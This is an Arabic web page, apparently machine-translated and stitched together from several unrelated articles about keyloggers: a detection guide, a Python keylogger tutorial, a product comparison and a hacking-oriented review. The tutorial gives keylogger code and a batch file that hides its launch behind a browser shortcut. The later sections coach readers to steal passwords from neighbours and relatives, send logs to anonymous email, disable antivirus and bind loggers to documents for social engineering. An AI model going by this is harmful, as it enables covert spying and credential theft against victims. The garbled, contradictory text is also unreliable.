يفتح
يغلق

ما هو استخدام كلوغر ل؟              مختبر أمن المعلومات البحث عن برامج تسجيل المفاتيح وإزالتها

هناك أنواع مختلفة من الحيل التي يستخدمها المتسللون لسرقة هويتنا.

Keylogger هو أحد التطبيقات أو الأدوات الضارة التي يستخدمها العديد من المتسللين لتتبع ما نكتبه ولمن وكيف نتصل بالشبكة. أصبح Keylogger أحد أقوى التهديدات هذه الأيام حيث يمكنه تسجيل ما تكتبه ومشاركته مع المتسللين.

إن معرفة كيفية اكتشاف برنامج Keylogger وإزالته من جهاز الكمبيوتر الخاص بك يمكن أن يساعد في حماية هويتك وخصوصيتك.

دليل خطوة بخطوة لاكتشاف Keylogger وإزالته من جهاز الكمبيوتر الخاص بك

ليس من السهل اكتشاف ما إذا كان جهاز الكمبيوتر الخاص بك متأثرًا ببرنامج Keylogger ما لم يحدده هذا الدليل. بالطبع، هناك أدوات وبرامج للكشف عن التهديدات الضارة، ومعرفة كيفية اكتشافها يدويًا يمكن أن تكون مفيدة عندما يتعلق الأمر بحماية هويتك.

فيما يلي طريقتان يمكنك من خلالهما اكتشاف ما إذا كان برنامج Keylogger مثبتًا على جهازك أم لا:

طريقة 1. افتح مدير المهام باستخدام اختصار لوحة المفاتيح Ctrl+Alt+Delete. انتقل إلى خيار العمليات وابحث عن نسخة مكررة من العملية المسماة Winlogon. لا بأس بعملية واحدة تحمل هذا الاسم، ولكن إذا كان هناك اثنتين منها، فهذا يعني أن جهازك مصاب ببرنامج Keylogger.

الطريقة 2: في بعض الأحيان يقوم برنامج Keylogger بإصابة الجهاز من خلال بعض البرامج الضارة التي يتم تثبيتها تلقائيًا على جهازك عندما نكون متصلين بالإنترنت. قد يؤدي البحث عن البرنامج غير المرغوب فيه في لوحة التحكم إلى الكشف عن برنامج Keylogger. فيما يلي كيفية اكتشاف البرامج غير المرغوب فيها من لوحة التحكم:

انتقل إلى قائمة "ابدأ"، وحدد "كافة البرامج"، ثم اعرض كافة البرامج المثبتة. إذا وجدت أي برنامج لم تقم بتثبيته، فقم بإزالته. بعد إزالة برنامج غير ضروري، تحتاج إلى إعادة تشغيل جهازك.

كيفية إزالة كلوغر

بمجرد أن تعرف كيفية اكتشاف برنامج Keylogger، يجب أن تعرف كيفية إزالته من جهاز الكمبيوتر الخاص بك. يمكن إزالة قفل المفاتيح من الجهاز باستخدام الطريقتين التاليتين:

طريقة 1. إذا وجدت برنامج Keylogger في مدير المهام، فاحذف النسخة المكررة من Winlogon.

الطريقة 2. إذا وجدت برنامجًا غير معروف مثبتًا على نظامك، فقم بإلغاء تثبيت البرنامج.

هاتان الطريقتان هما أسهل الطرق لاكتشاف وإزالة راصد لوحة المفاتيح يدويًا من نظامك. تضع الطرق اليدوية الأساس لحماية جهاز الكمبيوتر الخاص بك من الأنشطة الضارة وبالتالي تساعد في منع سرقة أي بيانات.

هناك أيضًا برامج متوفرة في السوق يمكنها مساعدتك في اكتشاف برامج رصد لوحة المفاتيح وإزالتها من جهاز الكمبيوتر الخاص بك. يمكنك التعرف على كيفية اكتشاف برنامج Keylogger وإزالته من جهاز الكمبيوتر الخاص بك عن طريق تثبيت برنامج يمكنه اكتشاف الأداة الضارة وإزالتها.

يقوم البرنامج بفحص جهاز الكمبيوتر الخاص بك بحثًا عن أي ملف ضار قادر على سرقة المعلومات المخزنة فيه وإرسالها إلى المتسللين.

عند اكتشاف ملفات ضارة، يقوم البرنامج بعزلها ومعالجتها أو حذفها أو استعادتها بعد قيام فريقك بالبحث.

لا يقوم البرنامج بفحص الكمبيوتر فحسب، بل يمنعه أيضًا أو يحميه عن طريق تعطيل التثبيت التلقائي لأي برنامج قد يكون معرضًا للخطر.

أصبح برنامج Keylogger يشكل تهديدًا كبيرًا حيث يستخدم المزيد من الأشخاص الأدوات الرقمية للقيام بمهام مختلفة. سواء أكان الأمر يتعلق بمعاملة عبر الإنترنت أو محادثات خاصة، يستطيع برنامج Keyloggers اختراق التفاصيل وتسجيل كل ما تكتبه باستخدام لوحة مفاتيح أجهزتنا.

نوعان من برامج تسجيل المفاتيح وكيفية تأثيرهما على جهاز الكمبيوتر الخاص بك.

هناك نوعان من Keylogger: Keylogger للأجهزة و Keylogger للبرامج.

أجهزة كلوغر:

يأتي برنامج Keylogger للأجهزة على شكل أجهزة USB يمكن توصيلها بنظام الكمبيوتر. هذا النوع المحدد من برامج تسجيل المفاتيح مدمج في الجزء الخلفي من وحدة المعالجة المركزية (CPU) ويلتقط نشاط لوحة المفاتيح.

برنامج كيلوجر:

تم دمج برنامج Keylogger في البرنامج المثبت أو المثبت على جهاز الكمبيوتر الخاص بك. عندما نقوم بتثبيت أي برنامج على نظام الكمبيوتر، يتم إنشاء ملفات معينة تلقائيًا. يمكن أن تكون هذه الملفات شريرة ويمكنها تسجيل المعلومات وسرقةها من جهاز الكمبيوتر الخاص بك.

بغض النظر عن نوع برنامج keylogger الذي يتأثر به جهاز الكمبيوتر الخاص بك، فإن كل برنامج keylogger يمكن أن يسبب خسائر لا رجعة فيها.

لذلك، من المهم للغاية اكتشاف برنامج Keylogger على الفور لمنع سرقة أي بيانات مهمة.

يمكنك حماية جهاز الكمبيوتر الخاص بك عن طريق تحديث برنامج مكافحة الفيروسات الخاص بك. غالبًا ما يساعد استخدام أجهزة الكشف عن الفيروسات أيضًا في اكتشاف أي برنامج خبيث ومنعه.

هناك أيضًا خدعة واحدة لمنعك من فقدان أي نوع من المعلومات من خلال لوحة المفاتيح، حيث يمكنك تخزين البيانات مثل اسم المستخدم وكلمة المرور في المفكرة ونسخ التفاصيل ولصقها عند الحاجة.

ومع ذلك، في هذه الحالة، ستحتاج إلى أن تكون على دراية إضافية بالبيانات المخزنة في المفكرة حيث يمكن للمتسللين سرقة المعلومات. إن خطر القرصنة موجود في كل مكان، لكن لا ينبغي أن يمنعنا ذلك من استخدام الأدوات الرقمية.

استخدم الأجهزة الذكية بحذر. لا تدع شيئًا مثل برنامج Keylogger يمنعك من المضي قدمًا في طريقك. تأكد من تحديث نظام الكمبيوتر الخاص بك وأن جميع البرامج تعمل بشكل صحيح.

إن تشغيل برنامج مكافحة الفيروسات بانتظام يمكن أن يساعد أيضًا في حماية جهاز الكمبيوتر الخاص بك عندما تكون متصلاً بالإنترنت وغير متصل بالإنترنت.

مرحبًا، كوازار هنا مرة أخرى. سأوضح لك اليوم كيفية إنشاء برنامج Keylogger بسيط في لغة Python. بالطبع، لا يستطيع برنامج Keylogger هذا التنافس مع عمالقة مثل، ولكن على الرغم من ذلك، يمكنه العثور على استخدامه.

ما هو كلوغر؟

يمكنك أن تقرأ بالتفصيل عن ماهية برنامج Keylogger وعن أنواع برامج Keyloggers في المقالة "". للعثور على مواد إضافية حول هذا الموضوع، استخدم البحث في الموقع، الموجود في الزاوية اليمنى العليا. فقط أدخل كلمة "keylogger" أو "keylogger".

كلوغر بسيط في بيثون

لإنشاء برنامج Keylogger نحتاج إلى:

  • نظام التشغيل: Windows أو MacOs (يمكن أيضًا استخدام أي Linux، لكنني لم أجربه شخصيًا)
  • تم تثبيت Python على الجهاز المستهدف، بالإضافة إلى المكتبات الخاصة.

وهذه المواد هي لأغراض إعلامية فقط. يتم توفير المعلومات الواردة في هذه المقالة لأغراض إعلامية فقط. لا يتحمل محررو موقع www.site ولا مؤلف المنشور أي مسؤولية عن أي ضرر ناتج عن المادة الواردة في هذه المقالة.

إنشاء Keylogger بسيط في بايثون

تحتاج أولاً إلى تنزيل Python وتثبيته.


كلوغر بسيط في بايثون

بعد تثبيت Python، تحتاج إلى تثبيت وحدات "pyHook" و"pywin32". ستجد في هذا الموقع إصدارات 32 و64 بت لنظام التشغيل Windows وأنظمة تشغيل أخرى. قم بتنزيل "PYhook" و"pyWin32" وفقًا لإصدار Python وWindows المثبت لديك (32 بت أو 64 بت).


كلوغر في بايثون. وحدة بي هوك
كلوغر في بايثون. وحدة pyWin32

بمجرد التنزيل، قم بتثبيت وفتح قائمة IDLE (Python GUI) من القائمة "ابدأ".

كلوغر بسيط في بايثون

انتقل إلى القائمة "ملف" وانقر على العنصر "ملف جديد". ثم قم بلصق كود برنامج Keylogger:

#الاسم: كوازار
#الموقع الالكتروني : www.site
استيراد pyHook، pythoncom، sys، التسجيل
file_log = "C:keyloggerlog.txt"
تعريف OnKeyboardEvent(الحدث):
logging.basicConfig(filename=file_log,level=logging.DEBUG, format="%(message)s")
مركز حقوق الإنسان (الحدث.Ascii)
logging.log(10,chr(event.Ascii))
عودة صحيح
Hooks_manager = pyHook.HookManager()
Hooks_manager.KeyDown = OnKeyboardEvent
Hooks_manager.HookKeyboard()
بايثونكوم.PumpMessages()

وحفظه عن طريق استدعاء الملف Keylogger.pyw. فقط لا تقم بحفظ الملف في الدليل الجذر C: حيث تحتاج إلى حقوق المسؤول لنسخ الملفات وحذفها. قم بإنشاء مجلد جديد على محرك الأقراص C: أو أي موقع آخر لا تحتاج فيه إلى حقوق المسؤول لنسخ الملفات وحفظ Keylogger.pyw هناك.

يمكنك تحديد أي موقع كملف تقرير الإخراج "file_log = "C:keyloggerlog.txt"، ولكن يفضل بالطبع بعض المواقع المخفية على محرك الأقراص الثابتة لديك. في هذا المثال، سأقوم بحفظ ملف التقرير على القرص في الدليل الجذر C:. بعد كل شيء، ليس لدي ما أخفيه.

الإطلاق التلقائي لبرنامج Keylogger في لغة Python

كلوغر جاهز. نحتاج الآن إلى التأكد من أن برنامج keylogger يبدأ مخفيًا عن المستخدم ويتم تلقائيًا عند تشغيل Windows. ويمكن تنفيذ ذلك بطرق مختلفة. دعونا نحاول القيام بذلك باستخدام ملف الخفافيش عن طريق ربط تشغيل برنامج Keylogger ببعض البرامج أو عن طريق تسجيله عند بدء التشغيل.

أولا، قم بإنشاء ملف الخفافيش. انسخ الكود التالي والصقه في المفكرة:

::الاسم: كوازار
::الموقع الإلكتروني: www.site
@صدى خارج
بدء "" "C:keyloggerkeylogger.pyw"
بدء "" "C:Program FilesOperalauncher.exe"

في السطر الأول، تحتاج إلى إدخال المسار إلى ملف keylogger.pyw (في حالتي "C:keylogger.pyw"). في السطر الثاني، يجب عليك إدخال المسار إلى البرنامج الذي يستخدمه المستخدم عادة (في حالتي، متصفح Opera).

بعد التحرير، احفظ الملف بامتداد .bat (في حالتي logger.bat) في موقع مخفي على جهاز الكمبيوتر الخاص بك (في حالتي في "C:keylogger.bat").

انتقل الآن إلى سطح المكتب وحدد اختصارًا لبرنامج مستخدم بشكل متكرر (في حالتي، هذا هو متصفح Opera). انقر بزر الماوس الأيمن فوق الماوس لاستدعاء قائمة السياق والانتقال إلى خصائص الاختصار. في حقل "الكائن"، أدخل المسار إلى ملف الخفافيش keylogger "C:keyloggerlogger.bat".

بعد إجراء التغييرات، سيتغير رمز الاختصار أيضًا. ولكن يمكن حل هذه المشكلة بسهولة في علامة التبويب "خصائص" (انظر لقطة الشاشة أعلاه).

تعد برامج التجسس المختلفة ضرورية في الظروف التي يكون فيها لدى العديد من الأشخاص إمكانية الوصول إلى جهاز كمبيوتر واحد.

في هذه الظروف، قد يرغب المستخدم في معرفة المواقع التي تمت زيارتها من جهاز الكمبيوتر الخاص به (على سبيل المثال، من قبل الأطفال)، وما إذا كانت بطاقات الائتمان قد سُرقت باستخدام كلمات المرور المحفوظة، وما إلى ذلك. لتوضيح هذه المشكلات، سيكون من الضروري.

ستسمح لك مراجعتنا باتخاذ الخيار الأفضل.

ميزات الاختيار

ما هو بالضبط كلوغر؟ هذا برنامج، بالمعنى الدقيق للكلمة، لا يرتبط مباشرة بلوحة المفاتيح.

يتم تثبيته في ذاكرة الكمبيوتر ويعمل عليه. وفي كثير من الأحيان، لا تظهر علامات نشاطها على الكمبيوتر إلا إذا بحثت عنها على وجه التحديد.

ويتفاعل مثل هذا البرنامج بشكل غير مباشر مع لوحة المفاتيح، أي أنه يعمل مع برنامج موجود في الكمبيوتر يقوم بتحويل الإشارات التي يستقبلها المعالج نتيجة الضغط على الأزرار إلى نص عند الطباعة.

أي أن عمل هذا البرنامج يهدف إلى جمع المعلومات التي يتم إدخالها من خلال لوحة المفاتيح.

تأتي هذه الأدوات المساعدة في أنواع مختلفة - مع بعضها يمكنك عرض كل النص المكتوب على لوحة المفاتيح، ومع بعضها الآخر - فقط ما تم كتابته في المتصفح أو في أي تطبيق محدد.

توفر بعض البرامج القدرة على تكوين مثل هذه المؤشرات، والبعض الآخر لا يفعل ذلك.

كما أنها تختلف عن بعضها البعض في درجة السرية. على سبيل المثال، نشاط البعض واضح، يبقى الاختصار على سطح المكتب، وما إلى ذلك، مثل البرامج مناسبة لمراقبة أنشطة الأطفال على سبيل المثال.

لا يمكن ملاحظة آثار وجود الآخرين ونشاطهم على الإطلاق - فهي تعمل بشكل مخفي ومناسبة للتثبيت على جهاز كمبيوتر شخص آخر، عندما يلزم إخفاء حقيقة التثبيت عن مستخدم خارجي.

ونظرًا لهذا التنوع، قد يكون اختيار البرنامج الأنسب أمرًا صعبًا للغاية.

تقدم هذه المادة أفضل البرامج التي يمكن استخدامها لهذا الغرض. من الأسهل اختيار الخيار المناسب بينهم.

تحديد

لتبسيط عملية اختيار البرامج، يوضح الجدول أدناه الخصائص المقارنة الرئيسية لجميع البرامج المدرجة في TOP.

اسمنوع الرخصةنوع المعلومات التي تم جمعهاوظيفيتصميم
SC-KeyLogمجاناالجميعواسعمبسط
WideStep مفيد كلوغرمجاني/مدفوعالجميعواسعتحسين
جاسوس حقيقيمدفوعالجميعواسع جدامعيار
EliteKeyloggerمدفوعالجميعواسعمعيار
الفأر!مجاني/مدفوعأقل من السابقواسع جدًاغير جمالية
سبيجومجانااعتمادا على الإصداراعتمادا على الإصدارمظهر Windows القياسي
أرداماكس كلوغر 2.9مجانامن لوحة المفاتيحضاقتمبسط
NS Keylogger مراقب شخصي 3.8مجاناالجميعضاقتمبسط
جاسوس الكي جي بيمدفوعمن لوحة المفاتيح + البرامج المفتوحةضيقبسيط
كلوجر الذهبي 1.32مجانامن لوحة المفاتيحضيقة جدًابسيط

بناءً على الخصائص الواردة في هذا الجدول، من السهل اختيار البرنامج الذي يناسب متطلباتك المحددة.

يتم وصف هذه الأدوات المساعدة بمزيد من التفاصيل أدناه.

SC-KeyLog

هذا برنامج تجسس ضخم وعملي يتم توزيعه مجانًا.

بالإضافة إلى تتبع المعلومات التي يتم إدخالها من لوحة المفاتيح على وجه التحديد، فهو قادر أيضًا على جمع عناوين المواقع التي تمت زيارتها وكلمات المرور ونوافذ المتصفح المفتوحة.

يوفر معلومات كاملة عن جميع الإجراءات التي يتم تنفيذها على الكمبيوتر. في هذه الحالة، يمكن عرض الملف الذي تم إنشاؤه عن بعد من جهاز آخر.

  • إمكانية الوصول عن بعد إلى ملف من جهاز آخر؛
  • لا توجد آثار لنشاط البرنامج على الكمبيوتر مع الإعدادات الصحيحة؛
  • مجموعة متنوعة من البيانات التي تم جمعها - يمكن الوصول إلى المعلومات حول جميع الإجراءات التي تتم على جهاز الكمبيوتر تقريبًا.
  • يحفظ كلمات المرور حتى NT0 فقط؛
  • قائمة بسيطة للغاية وتصميم غير جمالي.
  • تنسيق غير مريح إلى حد ما لعرض النتيجة.

ماذا يقول المستخدمون الذين يستخدمون هذا البرنامج بنشاط؟ "غير مرئية تمامًا للمستخدم"، "تصل البيانات بانتظام عبر البريد الإلكتروني."

WideStep مفيد كلوغر

يتم توزيع هذا التطبيق مجانا. النسخة المدفوعة كاملة تكلف 35 دولارًا.

برنامج مثير للاهتمام وعملي للغاية ويستحق المال إذا كنت على استعداد لدفعه.

سمة مميزة– القدرة على إرسال البيانات المسجلة بتردد محدد. وإلا فإنه يعمل بشكل جيد، وغالبًا ما يكون أكثر استقرارًا من البرامج الأخرى في هذه القائمة.

  • جمع أنواع مختلفة من المعلومات؛
  • إخفاء كامل للعمل على جهاز الكمبيوتر الخاص بالمستخدم؛
  • واجهة وضوابط بسيطة.
  • التصميم أفضل من البرنامج السابق، لكنه ليس رائعًا؛
  • تنسيق عرض النتيجة غير مناسب؛
  • النسخة المدفوعة مكلفة للغاية.

آراء المستخدمين حول هذا البرنامج هي كما يلي: "برنامج مريح وبسيط وعملي. غير مرئي تمامًا أثناء العمل."

جاسوس حقيقي

هذا برنامج مدفوع وظيفي ومعقد يكلف 600 روبل. ومع ذلك، فهو يحتوي على نسخة تجريبية مجانية.

ميزة هذا البرنامج- القدرة في فترة زمنية معينة.

يساعد هذا في حل مشكلة إدخال كلمة المرور/المفتاح الرسومي، والتي أصبحت منتشرة مؤخرًا.

  • العديد من أنواع المعلومات التي يتم جمعها بالإضافة إلى إمكانية التقاط لقطات الشاشة من الشاشة خلال فترة محددة؛
  • عدد كبير من الوظائف والميزات الإضافية الأخرى؛
  • لا يسجل الإجراءات فحسب، بل يسجل أيضًا الوقت الذي تم تنفيذه فيه؛
  • يقوم بتشفير السجل الذي تم إنشاؤه.
  • مدة العمل (جمع المعلومات) في النسخة التجريبية المجانية هي 40 دقيقة؛
  • التوزيع المدفوع، على الرغم من أن سعره معقول إلى حد ما؛
  • وزن البرنامج كبير جدًا.

تقييمات المستخدمين لهذا التطبيق هي كما يلي: "البرنامج ممتاز. أحسنتم أيها المبرمجون!

EliteKeylogger

برنامج مدفوع بسعر مرتفع إلى حد ما– 69 دولارا. إنه يعمل بشكل غير قابل للاكتشاف تمامًا على جهاز الكمبيوتر في وضع المستوى المنخفض، مما يجعله غير قابل للاكتشاف تمامًا تقريبًا.

ميزة مثيرة للاهتمام ومريحة– الإطلاق التلقائي للبرنامج، والذي يحدث بالتزامن مع إطلاق النظام نفسه.

من الصعب اكتشافها أو عدم اكتشافها على الإطلاق حتى بواسطة برامج مكافحة لوحة المفاتيح الخاصة.

  • عمل مخفي تمامًا ويصعب اكتشافه؛
  • تنسيق تشغيل من نوع برنامج التشغيل منخفض المستوى وبدء التشغيل التلقائي عند تشغيل النظام؛
  • كما أنه يتتبع ضغطات ليس فقط على المفاتيح الرئيسية، ولكن أيضًا على مفاتيح الخدمة على لوحة المفاتيح.
  • نظام معقد إلى حد ما لتثبيت البرنامج على جهاز الكمبيوتر؛
  • البرنامج باهظ الثمن، ولكن يمكنك العثور على نسخة قديمة مخترقة على الإنترنت الروسي؛
  • نظام معقد إلى حد ما لإعدادات البرامج الفردية، والذي، مع ذلك، يبرر نفسه.

ماذا يقول المستخدمون عن هذا البرنامج؟ "برنامج جيد"، "أقل قليلاً من برنامج Jetlogger."

الفأر!

أداة وظيفية شائعة جدًا وشائعة مع ترخيص مدفوع.

ومع ذلك، للاستخدام الخاص، يتم توفير نسخة تجريبية مجانية لفترة محدودة.

البرنامج بسيط جدا– يمكن لأي مستخدم متقدم أن يكتب نفس الشيء. ومع ذلك، لا يمكن اكتشافه تمامًا بواسطة برامج مكافحة الفيروسات والبرامج الخاصة التي تكتشف مثل هذه البرامج.

  • البساطة والأداء الوظيفي والاستقرار العالي؛
  • الحد الأدنى لوزن الملف والمساحة التي يشغلها على الكمبيوتر؛
  • الكثير من الإعدادات.
  • تصميم غير سار إلى حد ما، مصنوع باللون الأسود والأبيض والأحمر؛
  • الوظيفة أضيق إلى حد ما مما كانت عليه في البرامج الموضحة من قبل؛
  • عرض السجل غير مريح والواجهة والاستخدام غير مريح بشكل عام.

يقول المستخدمون عن هذا البرنامج ما يلي: "إنه يعمل بثبات، ولكنه بسيط بعض الشيء"، "البرنامج جيد، فهو يسمح لك بجمع البيانات دون أن يلاحظها أحد".

سبيجو

هذا برنامج Keylogger جديد بشكل أساسي، تم تصميمه للعمل عليه وتطويره بواسطة مبرمج روسي.

من منا لم يرغب في أن يشعر وكأنه متسلل رائع مرة واحدة على الأقل ويكسر شيئًا ما على الأقل؟ :) حتى لو لم يكن الأمر كذلك، فلنتحدث عن مدى روعة الحصول على كلمة مرور من بريدك الإلكتروني/شبكتك الاجتماعية. شبكة من صديق، زوجة/زوج، زميل في الغرفة يفكر فيها الجميع مرة واحدة على الأقل. :) نعم، وعليك أن تبدأ من مكان ما، بعد كل شيء! يتضمن جزء كبير من الهجمات (القرصنة) إصابة جهاز الكمبيوتر الخاص بالضحية بما يسمى ببرامج التجسس (برامج التجسس).

لذلك، في مقال اليوم سنتحدث عن ما هي برامج مجانية لمراقبة أجهزة الكمبيوتر التي تعمل بنظام Windowsحيث يمكنك تحميل نسختها الكاملة وكيفية إصابة حاسوب الضحية بها وما هي مميزات استخدامها.

ولكن أولا، مقدمة صغيرة.

ما هي برامج تسجيل المفاتيح ولماذا هي مطلوبة؟

أعتقد أنك نفسك خمنت ما هو عليه. كقاعدة عامة، فهي نوع من البرامج المخفية (على الرغم من أن هذا ليس هو الحال دائمًا) المثبتة على جهاز الكمبيوتر الخاص بالضحية، وبعد ذلك يتم تسجيل جميع ضغطات المفاتيح على هذه العقدة تمامًا. علاوة على ذلك، بالإضافة إلى النقرات نفسها، يتم عادةً تسجيل ما يلي: تاريخ ووقت النقرة (الإجراء) والبرنامج الذي تم تنفيذ هذه الإجراءات فيه (المتصفح، بما في ذلك عنوان موقع الويب (يا هلا، نرى على الفور ما هي كلمات المرور هي من أجل!)؛ وخدمات نظام التطبيق المحلي (بما في ذلك كلمات مرور تسجيل الدخول إلى Windows)، وما إلى ذلك).

من هنا تظهر إحدى المشكلات على الفور: لقد تمكنت من الوصول إلى جهاز الكمبيوتر الخاص بجارتي لبضع دقائق وأريد الحصول على كلمة المرور الخاصة بها من VK! لقد قمت بتثبيت البرنامج المعجزة وأعدت الكمبيوتر. كيف يمكنني البحث عن كلمات المرور لاحقًا؟ هل تبحث عن طريقة لأخذ الكمبيوتر منها مرة أخرى؟ والخبر السار هو: عادة لا. معظم برامج تسجيل المفاتيح قادرة ليس فقط على تخزين قاعدة البيانات المتراكمة بأكملها من الإجراءات محليًا، ولكن أيضًا إرسالها عن بُعد. هناك العديد من الخيارات لإرسال السجلات:

  • البريد الإلكتروني الثابت (قد يكون هناك عدة) هو الخيار الأكثر ملاءمة؛
  • خادم FTP (من لديه)؛
  • خادم SMB (غريب وغير مريح للغاية).
  • محرك أقراص محمول ثابت (تقوم بإدخاله في منفذ USB بجهاز الكمبيوتر الخاص بالضحية، ويتم نسخ جميع السجلات هناك تلقائيًا في الوضع غير المرئي!).

لماذا كل هذا مطلوب؟ أعتقد أن الإجابة واضحة. بالإضافة إلى سرقة كلمات المرور المبتذلة، يمكن لبعض برامج تسجيل المفاتيح القيام بعدد من الأشياء اللطيفة الأخرى:

  • تسجيل المراسلات في الشبكات الاجتماعية المحددة. الشبكات أو برامج المراسلة الفورية (على سبيل المثال، Skype).
  • أخذ لقطات من الشاشة.
  • عرض/التقاط بيانات كاميرا الويب (والتي يمكن أن تكون مثيرة جدًا للاهتمام).

كيفية استخدام كلوغر؟

وهذا سؤال صعب. عليك أن تفهم أن مجرد العثور على برنامج Keylogger مناسب وعملي وجيد لا يكفي.

لذا، ما هو المطلوب لكي يعمل برنامج التجسس بنجاح؟:

  • وصول المسؤول إلى جهاز كمبيوتر بعيد.
    علاوة على ذلك، فإن هذا لا يعني بالضرورة الوصول المادي. يمكنك الوصول إليه بسهولة عبر RDP (خدمة سطح المكتب البعيد)؛ برنامج TeamViewer; أميادمين، الخ.
    كقاعدة عامة، ترتبط أكبر الصعوبات بهذه النقطة. ومع ذلك، فقد كتبت مؤخرًا مقالًا حول كيفية الحصول على حقوق المسؤول في نظام التشغيل Windows.
  • بريد إلكتروني مجهول / بروتوكول نقل الملفات (الذي لن يتم التعرف عليك من خلاله).
    بالطبع، إذا كنت تكسر العمة شورا لجارك، فيمكن حذف هذه النقطة بأمان. كما هو الحال إذا كان جهاز الكمبيوتر الخاص بالضحية في متناول يدك دائمًا (حسنًا، اكتشف كلمات المرور الخاصة بأخيك/أختك).
  • عدم وجود برامج مكافحة فيروسات عاملة / أنظمة حماية داخلية لنظام التشغيل Windows.
    معظم برامج تسجيل المفاتيح العامة (التي سيتم مناقشتها أدناه) معروفة للغالبية العظمى من برامج مكافحة الفيروسات (على الرغم من وجود فيروسات مسجلة مدمجة في نواة نظام التشغيل أو برنامج تشغيل النظام، ولم تعد برامج مكافحة الفيروسات قادرة على اكتشافها أو تدميرها، حتى لو كانت تمتلك اكتشفتهم). نتيجة لما سبق، يجب تدمير برامج مكافحة الفيروسات، إن وجدت، بلا رحمة. بالإضافة إلى برامج مكافحة الفيروسات، تشكل أنظمة مثل Windows Defender (التي ظهرت لأول مرة في نظام التشغيل Windows 7 والإصدارات الأحدث) خطرًا على برامج التجسس لدينا. يكتشفون النشاط المشبوه في البرامج التي تعمل على جهاز الكمبيوتر. يمكنك بسهولة العثور على معلومات حول كيفية التخلص منها على Google.

ربما هذه كلها الشروط الضرورية والكافية لنجاحك في مجال سرقة كلمات المرور / مراسلات / صور الآخرين أو أي شيء آخر تريد التعدي عليه.

ما هي أنواع برامج التجسس الموجودة وأين يمكنني تنزيلها؟

لذا، فلنبدأ بمراجعة برامج Keylogger الرئيسية التي استخدمتها في ممارستي اليومية مع روابط للتنزيل المجاني لإصداراتها الكاملة (أي أن جميع الإصدارات هي الأحدث في الوقت الحالي (والتي من الممكن العثور على علاج لها) ومع تعمل بالفعل والشقوق اختبارها).

0. الفأر!

التقييمات (من 10):

  • الخفي: 10
  • الراحة/سهولة الاستخدام: 9
  • الوظيفة: 8

انها مجرد قنبلة، وليس كلوغر! في حالة صالحة للعمل يستغرق 15-20 كيلو بايت. لماذا تتفاجأ: إنه مكتوب بالكامل بلغة التجميع (يذرف المبرمجون المخضرمون الدموع) وقد كتبه في الغالب قراصنة متحمسون، ولهذا السبب فإن مستوى سريته مذهل بكل بساطة: فهو يعمل على مستوى نواة نظام التشغيل!

بالإضافة إلى ذلك، تتضمن الحزمة FileConnector - وهو برنامج صغير يسمح لك بتوصيل Keylogger هذا بأي برنامج على الإطلاق. ونتيجة لذلك، تحصل على ملف exe جديد بنفس الحجم تقريبًا، وعند تشغيله، يعمل تمامًا مثل البرنامج الذي قمت بلصقه معًا! ولكن بعد الإطلاق الأول، سيتم تثبيت برنامج Keylogger الخاص بك تلقائيًا في الوضع غير المرئي مع معلمات إرسال السجلات التي حددتها مسبقًا. مريحة، أليس كذلك؟

فرصة ممتازة للهندسة الاجتماعية (إحضار ملف لعبة/عرض تقديمي إلى صديق على محرك أقراص محمول، أو حتى مستند Word فقط (سأخبرك بكيفية إنشاء ملف exe يقوم بتشغيل ملف Word/excel محددًا في أحد مقالاتي التالية)، إطلاق، كل شيء على ما يرام ورائع، لكن الصديق مصاب بالفعل بشكل غير مرئي!). أو يمكنك ببساطة إرسال هذا الملف إلى صديق عن طريق البريد (ويفضل أن يكون رابطًا لتنزيله، نظرًا لأن خوادم البريد الحديثة تحظر إرسال ملفات exe). بالطبع، لا يزال هناك خطر من برامج مكافحة الفيروسات أثناء التثبيت (لكنه لن يكون موجودًا بعد التثبيت).

بالمناسبة، بمساعدة بعض التقنيات الأخرى، يمكنك لصق أي توزيع تثبيت مخفي معًا (توجد هذه في The Rat! وElite keylogger) ليس فقط مع ملفات exe (التي لا تزال تثير الشكوك بين المستخدمين الأكثر أو الأقل تقدمًا)، ولكن أيضًا مع ملفات Word / Excel العادية وحتى ملفات PDF! لن يفكر أحد أبدًا في ملف pdf بسيط، لكن هذا ليس هو الحال! :) كيف يتم ذلك هو موضوع مقالة منفصلة كاملة. يمكن لأولئك المتحمسين بشكل خاص أن يكتبوا لي أسئلة من خلال نموذج التعليقات. ;)

بشكل عام، الفأر! يمكن وصفها لفترة طويلة جدا والكثير. وقد تم هذا أفضل بكثير مني. هناك أيضا رابط التحميل هناك.

1. كلوغر النخبة

التقييمات (من 10):

  • الخفي: 10
  • الراحة/سهولة الاستخدام: 9
  • الوظيفة: 8

ربما يكون أحد أفضل برامج تسجيل المفاتيح التي تم إنشاؤها على الإطلاق. تشمل إمكانياته، بالإضافة إلى المجموعة القياسية (اعتراض جميع النقرات في سياق التطبيقات / النوافذ / المواقع)، اعتراض رسائل المراسلة الفورية، والصور من كاميرا الويب، وأيضًا - وهو أمر مهم جدًا! - اعتراض كلمات مرور خدمة WinLogon. بمعنى آخر، فهو يعترض كلمات مرور تسجيل الدخول إلى Windows (بما في ذلك كلمات المرور الخاصة بالمجال!). أصبح هذا ممكنًا بفضل عمله على مستوى برنامج تشغيل النظام وتشغيله حتى في مرحلة تمهيد نظام التشغيل. وبسبب هذه الميزة نفسها، يظل هذا البرنامج غير مرئي تمامًا لكل من Kasperosky وجميع برامج مكافحة البرامج الضارة الأخرى. بصراحة، لم أقابل أي برنامج Keylogger قادر على القيام بذلك.

ومع ذلك، لا ينبغي أن تخدع نفسك كثيرًا. تتعرف برامج مكافحة الفيروسات على برنامج التثبيت نفسه بسهولة شديدة، ولتثبيته ستحتاج إلى حقوق المسؤول وتعطيل جميع خدمات مكافحة الفيروسات. بعد التثبيت، كل شيء سوف يعمل بشكل مثالي في أي حال.

بالإضافة إلى ذلك، تقدم الميزة الموصوفة (التي تعمل على مستوى نواة نظام التشغيل) متطلبات إصدار نظام التشغيل الذي سيعمل عليه برنامج تسجيل المفاتيح. الإصدار 5-5.3 (الروابط الواردة أدناه) يدعم كل شيء حتى نظام التشغيل Windows 7، بما في ذلك. لم يعد نظام Win 8 / 10، وكذلك عائلة Windows Server (2003 / 2008 / 2012) مدعومين. هناك الإصدار 6، الذي يعمل بشكل مثالي، بما في ذلك. ومع ذلك، في نظامي التشغيل Win 8 و10، لا يمكن حاليًا العثور على نسخة متصدعة. ومن المحتمل أن يظهر في المستقبل. في غضون ذلك، يمكنك تنزيل برنامج Elite keylogger 5.3 من الرابط أعلاه.

